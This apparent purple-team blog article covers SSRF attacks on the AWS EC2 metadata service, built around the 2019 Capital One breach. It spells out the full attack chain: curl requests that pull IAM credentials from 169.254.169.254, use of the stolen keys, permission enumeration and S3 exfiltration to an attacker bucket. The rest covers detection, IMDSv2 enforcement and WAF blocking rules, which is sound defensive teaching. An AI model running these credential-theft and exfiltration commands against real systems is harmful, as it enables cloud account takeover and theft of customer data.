pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned to the top-right corner, hidden until revealed below. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Also reveal the button when it receives focus, so keyboard users who Tab
   to it are not left on an invisible (opacity:0) control. */
.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: purely decorative (pointer-events:none), shown on hover. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: collapsed borders with zebra striping. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Run once per page: the window-level flag makes any later copy of this
  // script return immediately instead of decorating the blocks twice.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;

  // Decorate every <pre>: tag it with its language (read from the child
  // <code> element's "language-xxx" class), prepend a language badge, and
  // append a Copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=snippetText(pre,code);
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }

  // Text to copy. Prefer the <code> child. For a bare <pre>, read a clone with
  // the injected badge/button removed so the button's "Copy" label does not
  // end up in the copied text. The clone is detached (not rendered), so
  // textContent is read instead of innerText.
  function snippetText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){
      if(el.parentNode)el.parentNode.removeChild(el);
    });
    return clone.textContent;
  }

  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}

  // Failure feedback: show the failure label for two seconds.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}

  // Fallback copy via an off-screen <textarea> and execCommand('copy').
  // execCommand reports failure by returning false (not only by throwing),
  // so its return value decides which feedback is shown. The textarea is
  // removed in `finally` so it cannot be left in the DOM when a step throws.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }

  // Enhance now if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What Is Purple Team?</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 Cloud</a> → <a href="/cloud-security-breaches-2020-2025/">Breach Landscape 2020–2025</a> → <a href="/broken-access-control-aws-cloud/">Broken Access Control</a> → <a href="/mfa-fatigue-attack-uber-okta/">MFA Fatigue</a> → <a href="/cicd-secrets-exposure-supply-chain/">CI/CD Secrets</a> → <strong>SSRF to Cloud Metadata</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>SSRF cloud metadata attack</strong> is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach <code class="" data-line="">169.254.169.254</code> — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication</li>
<li>IMDSv1 (the only version available until IMDSv2 shipped in November 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient</li>
<li>Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement</li>
<li>IMDSv2 requires a PUT request to obtain a session token first — a step that a typical SSRF primitive, limited to GET requests without custom headers, cannot perform — making the IMDS resistant to standard SSRF exploitation; <code class="" data-line="">--http-tokens required</code> is the one-line enforcement</li>
<li>Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer</li>
<li>The structural fix is eliminating the credential entirely: <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity</a> replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can&#039;t follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p>The <strong>SSRF cloud metadata attack</strong> chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.</p>
<hr />
<h2 id="the-incident-capital-one-2019">The Incident: Capital One (2019)</h2>
<p>In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.</p>
<p>The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF&#8217;s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.</p>
<p>The attack chain, reconstructed from court documents and Capital One&#8217;s public disclosures:</p>
<pre><code class="" data-line="">1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: &quot;capital-one-waf-role&quot; (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers
</code></pre>
<p>IMDSv1 required no authentication. The WAF&#8217;s attached IAM role had <code class="" data-line="">s3:GetObject</code> and <code class="" data-line="">s3:ListBucket</code> permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.</p>
<p>Capital One paid a $190M settlement. AWS did not remove IMDSv1 as a result — instead, it released IMDSv2 as an opt-in hardening in November 2019, months after the breach was discovered (July 2019). The breach itself predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.</p>
<p>The revelation that the industry took away: <strong>IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials.</strong> The SSRF doesn&#8217;t need to be severe or complex. It just needs to reach <code class="" data-line="">169.254.169.254</code>.</p>
<hr />
<h2 id="red-phase-how-the-attack-works">Red Phase: How the Attack Works</h2>
<h3 id="what-ssrf-is">What SSRF Is</h3>
<p>Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker&#8217;s choosing. The server acts as a proxy: the request originates from the server&#8217;s network context, not the attacker&#8217;s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.</p>
<p>SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:<br />
&#8211; Image URL upload/preview (e.g., &#8220;fetch this avatar URL&#8221;)<br />
&#8211; Webhook configuration (server calls a URL you provide)<br />
&#8211; PDF generation from URL<br />
&#8211; Reverse proxies and WAFs with request-forwarding rules<br />
&#8211; Server-side URL validation endpoints</p>
<h3 id="why-the-metadata-endpoint-is-the-target">Why the Metadata Endpoint Is the Target</h3>
<p><code class="" data-line="">169.254.169.254</code> is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.</p>
<p>The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.</p>
<pre><code class="" data-line=""># (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what&#039;s available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
</code></pre>
<p>The response from Step 2 looks like this:</p>
<pre><code class="" data-line="">{
  &quot;Code&quot;: &quot;Success&quot;,
  &quot;LastUpdated&quot;: &quot;2019-03-22T18:03:30Z&quot;,
  &quot;Type&quot;: &quot;AWS-HMAC&quot;,
  &quot;AccessKeyId&quot;: &quot;ASIAQFAKEKEYIDEXAMPLE&quot;,
  &quot;SecretAccessKey&quot;: &quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY&quot;,
  &quot;Token&quot;: &quot;FQoDYXdzEJr//////////wEa...very-long-session-token...==&quot;,
  &quot;Expiration&quot;: &quot;2019-03-23T00:03:30Z&quot;
}
</code></pre>
<p>These are real, valid AWS temporary credentials. The <code class="" data-line="">Token</code> field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.</p>
<h3 id="the-full-attack-chain">The Full Attack Chain</h3>
<p>Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:</p>
<p><strong>Step 1: Confirm the SSRF and find the metadata endpoint</strong></p>
<pre><code class="" data-line=""># Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed
</code></pre>
<p><strong>Step 2: Exfiltrate credentials via SSRF</strong></p>
<pre><code class="" data-line=""># Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON
</code></pre>
<p><strong>Step 3: Use credentials from attacker&#8217;s system</strong></p>
<pre><code class="" data-line=""># Export the stolen credentials
export AWS_ACCESS_KEY_ID=&quot;ASIAQFAKEKEYIDEXAMPLE&quot;
export AWS_SECRET_ACCESS_KEY=&quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY&quot;
export AWS_SESSION_TOKEN=&quot;FQoDYXdzEJr...==&quot;

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid
</code></pre>
<pre><code class="" data-line="">{
    &quot;UserId&quot;: &quot;AROAQFAKEUSERID:i-01234567890abcdef0&quot;,
    &quot;Account&quot;: &quot;123456789012&quot;,
    &quot;Arn&quot;: &quot;arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0&quot;
}
</code></pre>
<p><strong>Step 4: Enumerate and exfiltrate</strong></p>
<pre><code class="" data-line=""># List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn &quot;arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0&quot; \
  --action-names &quot;s3:GetObject&quot; &quot;s3:PutObject&quot; &quot;ec2:DescribeInstances&quot; &quot;iam:ListRoles&quot; \
  --query &#039;EvaluationResults[?EvalDecision==`allowed`].EvalActionName&#039; \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/
</code></pre>
<h3 id="simulating-it-safely-test-imdsv1-enforcement-on-your-own-instances">Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances</h3>
<p>Before running detection controls, confirm which of your instances are still vulnerable:</p>
<pre><code class="" data-line=""># Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query &#039;Reservations[].Instances[].MetadataOptions&#039;
</code></pre>
<pre><code class="" data-line="">[
    {
        &quot;State&quot;: &quot;applied&quot;,
        &quot;HttpTokens&quot;: &quot;optional&quot;,           ← &quot;optional&quot; means IMDSv1 is still enabled
        &quot;HttpPutResponseHopLimit&quot;: 1,
        &quot;HttpEndpoint&quot;: &quot;enabled&quot;,
        &quot;HttpProtocolIpv6&quot;: &quot;disabled&quot;,
        &quot;InstanceMetadataTags&quot;: &quot;disabled&quot;
    }
]
</code></pre>
<p><code class="" data-line="">&quot;HttpTokens&quot;: &quot;optional&quot;</code> means IMDSv1 is still active. Any SSRF in the instance&#8217;s software stack can reach these credentials without a token.</p>
<pre><code class="" data-line=""># Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query &#039;Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }&#039; \
  --output table | \
  grep -E &quot;optional|INSTANCE&quot;
# Any row showing &quot;optional&quot; is IMDSv1-exposed
</code></pre>
<hr />
<h2 id="blue-phase-detection">Blue Phase: Detection</h2>
<h3 id="what-cloudtrail-logs-when-imds-credentials-are-abused">What CloudTrail Logs When IMDS Credentials Are Abused</h3>
<p>The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker&#8217;s use of the stolen credentials is what generates logs. The key signal is <strong><code class="" data-line="">GetCallerIdentity</code> from an unusual source IP</strong> paired with the instance role&#8217;s ARN appearing in CloudTrail from an IP that is not the instance itself.</p>
<pre><code class="" data-line=""># Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE=&quot;MyApplicationRole&quot;
INSTANCE_IP=&quot;10.0.1.50&quot;  # Your instance&#039;s known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time &quot;$(date -d &#039;7 days ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].CloudTrailEvent&#039; \
  --output text | \
  jq -r &#039;fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == &quot;&#039;&quot;${DETECTOR_ROLE}&quot;&#039;&quot;) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }&#039; | \
  jq &quot;select(.sourceIP != \&quot;${INSTANCE_IP}\&quot;)&quot;
  # Any result here = role credentials being used from outside the instance
</code></pre>
<p>The tell: the <code class="" data-line="">userIdentity.arn</code> will contain the instance ID as the role session name (e.g., <code class="" data-line="">assumed-role/MyApplicationRole/i-01234567890abcdef0</code>). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.</p>
<h3 id="guardduty-the-purpose-built-finding">GuardDuty: The Purpose-Built Finding</h3>
<p>GuardDuty has a specific finding for exactly this scenario:</p>
<p><strong><code class="" data-line="">UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS</code></strong></p>
<p>This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has exfiltrated the credentials to their own system and is using them from there.</p>
<pre><code class="" data-line=""># Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

aws guardduty list-findings \
  --detector-id &quot;${DETECTOR_ID}&quot; \
  --finding-criteria &#039;{
    &quot;Criterion&quot;: {
      &quot;type&quot;: {
        &quot;Equals&quot;: [
          &quot;UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS&quot;,
          &quot;UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS&quot;
        ]
      }
    }
  }&#039; \
  --query &#039;FindingIds&#039; --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-ids | \
  jq &#039;.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }&#039;
</code></pre>
<p>A second finding to watch:</p>
<p><strong><code class="" data-line="">Recon:IAMUser/UserPermissions</code></strong> — fires when the stolen credentials are used to enumerate IAM permissions (the <code class="" data-line="">iam:SimulatePrincipalPolicy</code> call from the attacker&#8217;s Step 4 above). Often appears immediately before the data exfiltration events.</p>
<h3 id="vpc-flow-logs-connections-to-169254169254">VPC Flow Logs: Connections to 169.254.169.254</h3>
<p>VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:</p>
<pre><code class="" data-line=""># Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = &#039;169.254.169.254&#039;
  AND action = &#039;ACCEPT&#039;
  AND from_unixtime(start) &gt; current_timestamp - interval &#039;24&#039; hour
ORDER BY start_time DESC;
</code></pre>
<p>If you see source IPs in this query that are not your EC2 instance&#8217;s primary private IP — for example, container IPs within the pod CIDR — and you have <code class="" data-line="">--http-put-response-hop-limit 1</code> set, those requests should be failing. If they&#8217;re succeeding, the hop limit is not enforced.</p>
<h3 id="imdsv2-hop-limit-why-it-blocks-containerized-attacks">IMDSv2 Hop Limit: Why It Blocks Containerized Attacks</h3>
<p>The hop limit is a separate defense from the token requirement. With <code class="" data-line="">--http-put-response-hop-limit 1</code>, the IMDS sends the response to the token PUT request — the packet that carries the IMDSv2 token — with an IP TTL of 1. When a process running inside a container on a bridged network asks for a token, that response has to travel back across:</p>
<pre><code class="" data-line="">Hypervisor IMDS endpoint → host network namespace → veth pair → container network namespace
</code></pre>
<p>That extra hop decrements the TTL to 0, so the response carrying the token is dropped before it reaches the container. The caller never receives a token. The GET request that follows has no token and — if <code class="" data-line="">--http-tokens required</code> is also set — is rejected.</p>
<pre><code class="" data-line="">Hop limit = 1:
  IMDS → host → [TTL=0, token response dropped before the veth hop]
  Container never receives a token

Hop limit = 2 (required for EKS with IMDS access):
  IMDS → host → veth → container
  Token is delivered; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS
</code></pre>
<p>For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity</a> — pods get short-lived tokens scoped to their service account, not the node&#8217;s IAM role.</p>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="fix-1-enforce-imdsv2-the-non-negotiable-control">Fix 1: Enforce IMDSv2 — The Non-Negotiable Control</h3>
<p>This is not optional. Every EC2 instance running production workloads should have <code class="" data-line="">--http-tokens required</code>. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.</p>
<pre><code class="" data-line=""># Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query &#039;Reservations[].Instances[].MetadataOptions&#039;
# &quot;HttpTokens&quot;: &quot;required&quot; confirms IMDSv2 is enforced
</code></pre>
<pre><code class="" data-line=""># Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version &#039;$Latest&#039; \
  --launch-template-data &#039;{
    &quot;MetadataOptions&quot;: {
      &quot;HttpTokens&quot;: &quot;required&quot;,
      &quot;HttpPutResponseHopLimit&quot;: 1,
      &quot;HttpEndpoint&quot;: &quot;enabled&quot;
    }
  }&#039;

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version &#039;$Latest&#039;
</code></pre>
<pre><code class="" data-line=""># Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently &quot;optional&quot;
aws ec2 describe-instances \
  --query &#039;Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId&#039; \
  --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read instance_id; do
    echo &quot;Enforcing IMDSv2 on: $instance_id&quot;
    aws ec2 modify-instance-metadata-options \
      --instance-id &quot;$instance_id&quot; \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done
</code></pre>
<h3 id="fix-2-scp-to-block-imdsv1-org-wide">Fix 2: SCP to Block IMDSv1 Org-Wide</h3>
<p>An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can&#8217;t accidentally revert it.</p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;RequireIMDSv2OnNewInstances&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: &quot;ec2:RunInstances&quot;,
      &quot;Resource&quot;: &quot;arn:aws:ec2:*:*:instance/*&quot;,
      &quot;Condition&quot;: {
        &quot;StringNotEquals&quot;: {
          &quot;ec2:MetadataHttpTokens&quot;: &quot;required&quot;
        }
      }
    },
    {
      &quot;Sid&quot;: &quot;DenyIMDSv1ReEnablement&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: &quot;ec2:ModifyInstanceMetadataOptions&quot;,
      &quot;Resource&quot;: &quot;*&quot;,
      &quot;Condition&quot;: {
        &quot;StringEquals&quot;: {
          &quot;ec2:MetadataHttpTokens&quot;: &quot;optional&quot;
        }
      }
    }
  ]
}
</code></pre>
<p>Apply this SCP to all OUs except the management account. New <code class="" data-line="">ec2:RunInstances</code> calls that don&#8217;t include <code class="" data-line="">MetadataOptions.HttpTokens=required</code> will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.</p>
<h3 id="fix-3-oidc-workload-identity-eliminate-the-credential-entirely">Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely</h3>
<p>Enforcing IMDSv2 removes the SSRF-to-IMDS path. <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity</a> goes further and removes the credential from the picture entirely — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.</p>
<p>For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod&#8217;s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node&#8217;s instance profile requires no IAM permissions for application workloads.</p>
<pre><code class="" data-line=""># EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials
</code></pre>
<h3 id="fix-4-restrict-ssrf-at-the-network-and-application-layer">Fix 4: Restrict SSRF at the Network and Application Layer</h3>
<p>IMDSv2 enforcement is the primary control. Defence in depth adds:</p>
<pre><code class="" data-line=""># WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name &quot;BlockSSRFToIMDS&quot; \
  --scope REGIONAL \
  --capacity 10 \
  --rules &#039;[
    {
      &quot;Name&quot;: &quot;BlockIMDSAccess&quot;,
      &quot;Priority&quot;: 0,
      &quot;Statement&quot;: {
        &quot;ByteMatchStatement&quot;: {
          &quot;SearchString&quot;: &quot;169.254.169.254&quot;,
          &quot;FieldToMatch&quot;: {&quot;QueryString&quot;: {}},
          &quot;TextTransformations&quot;: [{&quot;Priority&quot;: 0, &quot;Type&quot;: &quot;NONE&quot;}],
          &quot;PositionalConstraint&quot;: &quot;CONTAINS&quot;
        }
      },
      &quot;Action&quot;: {&quot;Block&quot;: {}},
      &quot;VisibilityConfig&quot;: {
        &quot;SampledRequestsEnabled&quot;: true,
        &quot;CloudWatchMetricsEnabled&quot;: true,
        &quot;MetricName&quot;: &quot;BlockIMDSAccess&quot;
      }
    }
  ]&#039; \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS
</code></pre>
<pre><code class="" data-line=""># Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance&#039;s AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly
</code></pre>
<p>Note: iptables-based egress filtering is a secondary control. A root process, or any process with <code class="" data-line="">CAP_NET_ADMIN</code>, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.</p>
<hr />
